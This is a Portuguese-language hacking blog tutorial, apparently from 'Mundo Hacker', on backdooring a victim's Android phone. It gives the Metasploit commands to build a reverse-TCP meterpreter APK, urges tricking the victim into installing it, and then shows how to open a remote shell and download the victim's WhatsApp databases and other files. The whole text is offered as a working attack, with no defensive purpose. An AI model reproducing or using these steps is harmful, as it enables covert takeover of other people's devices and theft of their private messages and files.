URL:

Opção :




Invadindo android e Capturando Banco de dados e qualquer Arquivo do Aparelho



Tutorial - invadindo Android e roubando
banco de dados de usuários do WhatsApp e qualquer
outro arquivo do aparelho da vitima.
O que faremos aqui? iremos criar um backdoor que ira permitir
voçê acessar remotamente o android da
vitima e modificar , apagar e fazer o que bem entender.
Utilizando uma distribuição Linux - como o Kali Linux por exemplo - é possível criar um backdoor para infectar aparelhos Android graças a um módulo disponível no Metasploit Framework.

Primeiro crie um payload e dê enter:

# msfpayload android/meterpreter/reverse_tcp LHOST=[ip] LPORT=[porta] R > nomedo.apk

Para saber o IP que deverá digitar em LHOST, digite em uma nova aba do terminal "ifconfig" e confira o ip da sua rede. Em LPORT você pode usar a porta 4444 ou outra, lembrando que a porta do seu modem/roteador precisa estar aberta.

Pronto, agora envie o arquivo gerado para a vitima e faça com que ela instale - se vire amigo. usa ai a tuas habilidades em engenharia social.

Depois da vitima ter instalado o arquivo para o Aparelho, volte ao terminal, digite "msfconsole" e vamos prosseguir com o seguinte comando:

# use exploit/multi/handler
# set PAYLOAD android/meterpreter/reverse_tcp
# set LHOST [ip]
# set LPORT [porta]
# exploit

Se ocorrer tudo certo, após digitar o comando "exploit" o Metasploit vai acusar conexão reversa e então abrirá automaticamente o Meterpreter. Então agora use o comando abaixo para abrir o shell interativo do terminal.

# shell

/sdcard/WhatsApp/Databases.

pwd - mostra em que local você está.
ls - mostra os arquivos de onde você está.
cd - é como se fosse o click de um mouse para abrir uma pasta.



download caminho/arquivo/vítima/arquivo /root/Desktop

Ali em cima onde está /root/Desktop é o local onde salvará os arquivos baixados.

Feito o download, você perceberá que os arquivos estão criptografados, o WhatsApp muda a criptografia periodicamente - por isto coloquei lá em cima do artigo "Atenção , para que funcione corretamente observe todas as etapas e a vitima deve instalado o Apk." - agora é com vocês pesquise na internet como descriptografar os arquivos db.cryptX (onde X é um número qualquer).

Compartilhar usando :

DEIXE SEU COMENTARIO :

Comentarios - Mundo Hacker | Facebook-copyright(™ © ®)